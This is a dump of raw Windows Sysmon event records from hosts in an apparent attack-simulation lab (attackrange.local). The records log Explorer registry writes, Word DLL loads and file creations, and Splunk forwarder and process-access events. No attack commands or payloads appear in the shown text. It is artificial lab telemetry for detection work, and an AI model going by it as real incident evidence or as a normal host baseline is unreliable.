19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606725Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.RkcybereBinary Data 13241300x80000000000000001606724Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606723Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Svyr Rkcybere (7).yaxBinary Data 13241300x80000000000000001606722Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606721Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Svyr Rkcybere (7).yaxBinary Data 13241300x80000000000000001606720Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LaunchCountDWORD (0x00000015) 13241300x80000000000000001606719Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A225A5E4-F523-4E7D-8A84-CF07A6F8646E}\LastAccessedTimeQWORD (0x01d736e3-0x3422c910) 12241200x80000000000000001606718Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps 13241300x80000000000000001606717Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606716Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.RkcybereBinary Data 13241300x80000000000000001606715Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606714Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Svyr Rkcybere (7).yaxBinary Data 13241300x80000000000000001606713Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606712Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.089{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Svyr Rkcybere (7).yaxBinary Data 734700x80000000000000001606711Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.086{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Windows\System32\synceng.dll10.0.14393.0 (rs1_release.160715-1616)Windows Briefcase EngineMicrosoft® Windows® Operating SystemMicrosoft CorporationSYNCENG.DLLMD5=A683B60F1A5FAC27D1173F937403ED1B,SHA256=57450827A7F7D880F236F27A1D92654A3284842226539A26F311CFA736083571trueMicrosoft WindowsValid 734700x80000000000000001606710Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.085{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Windows\System32\syncui.dll10.0.14393.2608 (rs1_release.181024-1742)Windows BriefcaseMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSYNCUI.DLLMD5=D3CD7E690590A1AD564C832DFE1A1922,SHA256=F3CB2B362A0970B106D8B5F27F80D019931090D3ED579C72182163502BA212B7trueMicrosoft WindowsValid 13241300x80000000000000001606709Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.067{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001606708Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.067{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 734700x80000000000000001606707Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.067{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Windows\System32\DataExchange.dll10.0.14393.4169 (rs1_release.210107-1130)Data exchangeMicrosoft® Windows® Operating SystemMicrosoft CorporationDataExchange.dllMD5=23F499FA8F8E02A8090FB78E80617BDD,SHA256=08C2E505F3765D98379BB88DC8AD5555AB680A691054933FCA1A2CFCDFA42F51trueMicrosoft WindowsValid 734700x80000000000000001606706Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.067{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\explorer.exeC:\Windows\System32\twext.dll10.0.14393.4283 (rs1_release.210303-1802)Previous Versions property pageMicrosoft® Windows® Operating SystemMicrosoft Corporationtwext.dllMD5=52DA27C0F880437C2E6DA97516D68EDD,SHA256=D90E5DE35E53C01F57BD201D483A6E03C77F76C7BC497C83F85003F937779425trueMicrosoft WindowsValid 734700x80000000000000001606705Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.067{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEC:\Windows\System32\sxs.dll10.0.14393.4169 (rs1_release.210107-1130)Fusion 
2.5Microsoft® Windows® Operating SystemMicrosoft CorporationSXS.DLLMD5=54FB18CA661D074CBB60D5A58D40C8D3,SHA256=A2BD6160222A216F8A6830C1273662F8AE88F53D2CE6DA5893FF70D146A0A2B0trueMicrosoft WindowsValid 12241200x80000000000000001606704Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.067{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKCR\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance 12241200x80000000000000001606703Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:09.067{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKCR\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance 13241300x80000000000000001606702Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.067{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\16.0\Common\Roaming\RoamingLastWriteTimeWordBinary Data 13241300x80000000000000001606701Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.067{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\16.0\Common\Roaming\RoamingLastSyncTimeWordBinary Data 11241100x80000000000000001606700Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.051{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat2021-04-19 12:25:39.474 23542300x80000000000000001606699Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:09.051{21761711-84C9-607D-F200-00000000BB01}3784WIN-HOST-5\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.datMD5=58FDE1A71D2ADB272DABB3A92B406559,SHA256=555933C7D5D49EBF3648EE1EF420E0C71835139B8A8DEF8FBA64C9EBE48B0C32falsefalse - insufficient disk space 13241300x80000000000000001606698Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:09.051{21761711-84C6-607D-E500-00000000BB01}2532C:\Windows\system32\dwm.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\PUUActiveBinary Data 254200x80000000000000001606871Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.856{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\ADMINI~1\AppData\Local\Temp\2\Diagnostics\WINWORD\App_1619027401671195500_A6DFB4F7-B699-43CE-B9A9-C61D0BE35D08.log2021-04-21 17:50:01.6562021-04-21 17:50:01.656 13241300x80000000000000001606870Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.856{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000A062E\VirtualDesktopBinary Data 12241200x80000000000000001606869Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:10.856{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000A062E 11241100x80000000000000001606868Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft 
Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.CampaignStates.json2021-04-19 17:20:23.952 23542300x80000000000000001606867Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.CampaignStates.jsonMD5=E7535DE8EE1BE5E7688A85EEFB39FFCD,SHA256=FC09B09EEB8A945EC71EBD641C7E330A37065444F9E33998DA2C69FAB2FB34B4falsefalse - insufficient disk space 13241300x80000000000000001606866Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348\0Binary Data 11241100x80000000000000001606865Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.GovernedChannelStates.json2021-04-19 17:20:23.952 23542300x80000000000000001606864Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.GovernedChannelStates.jsonMD5=6D84CEE6D5BB054054BE87D1056E8D95,SHA256=2A25607260860071A6C809F63DF347A83424DAA3386FCC0239024481460A2D1Efalsefalse - insufficient disk space 11241100x80000000000000001606863Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program 
Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyHistoryStats.json2021-04-19 17:20:23.952 23542300x80000000000000001606862Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyHistoryStats.jsonMD5=536AD5104BF69553F6798611F34928AB,SHA256=FC9F0B5E89246B67178A66C1B6FDF68F07F24549D53592B098C1DDDAE63EA726falsefalse - insufficient disk space 11241100x80000000000000001606861Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.CampaignStates.json2021-04-19 17:20:23.952 23542300x80000000000000001606860Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.CampaignStates.jsonMD5=E7535DE8EE1BE5E7688A85EEFB39FFCD,SHA256=FC09B09EEB8A945EC71EBD641C7E330A37065444F9E33998DA2C69FAB2FB34B4falsefalse - insufficient disk space 11241100x80000000000000001606859Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyEventActivityStats.json2021-04-19 17:20:23.952 23542300x80000000000000001606858Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyEventActivityStats.jsonMD5=6CA4960355E4951C72AA5F6364E459D5,SHA256=88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3falsefalse - insufficient disk space 11241100x80000000000000001606857Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.Settings.json2021-04-19 17:20:23.952 23542300x80000000000000001606856Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.Settings.jsonMD5=E4E83F8123E9740B8AA3C3DFA77C1C04,SHA256=6034F27B0823B2A6A76FE296E851939FD05324D0AF9D55F249C79AF118B0EB31falsefalse - insufficient disk space 13241300x80000000000000001606855Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348\0Binary Data 23542300x80000000000000001606854Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft 
Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{347A3A16-2659-4988-B61C-C2F5CEC54D2E}.tmpMD5=5D4D94EE7E06BBB0AF9584119797B23A,SHA256=4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1falsefalse - insufficient disk space 23542300x80000000000000001606853Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348WIN-HOST-5\AdministratorC:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Templates\~$Normal.dotmMD5=56B4F3D291EC004428BF2ED9552A3818,SHA256=3FD6C5A2122B7746D110F32071EC9EC208E74C097CB9367CD84FCC9E50376BD3falsefalse - insufficient disk space 13241300x80000000000000001606852Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348\0Binary Data 12241200x80000000000000001606851Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-DeleteKey2021-04-21 19:19:10.840{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000000A062E 13241300x80000000000000001606850Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.840{21761711-65C9-6080-565E-00000000BB01}3348C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3348\0Binary Data 13241300x80000000000000001606849Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
19:19:10.809{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001606848Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:19:10.809{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 11241100x80000000000000001606847Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.793{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606846Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:10.793{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=023C298990AC6719962E4CA2B29DA131,SHA256=71262056114D321FE6BB71E01CB8C0EDFEE5F0BA142865D31B77508A9613EA77falsefalse - insufficient disk space 13241300x80000000000000001606845Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:10.792{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001606844Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
19:19:10.792{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15Binary Data 23542300x80000000000000001095415Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.993{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C7C72CE4DD6EB8F644E559596D600EC,SHA256=63D708871D942CA2DA340E12FB912A50BEC5CE9959A03AA04005EE3A7B6404C3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095414Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.657{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7AAE-6080-9D5F-00000000BA01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095413Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:10.656{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095412Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:10.656{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095411Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:19:10.656{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095410Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 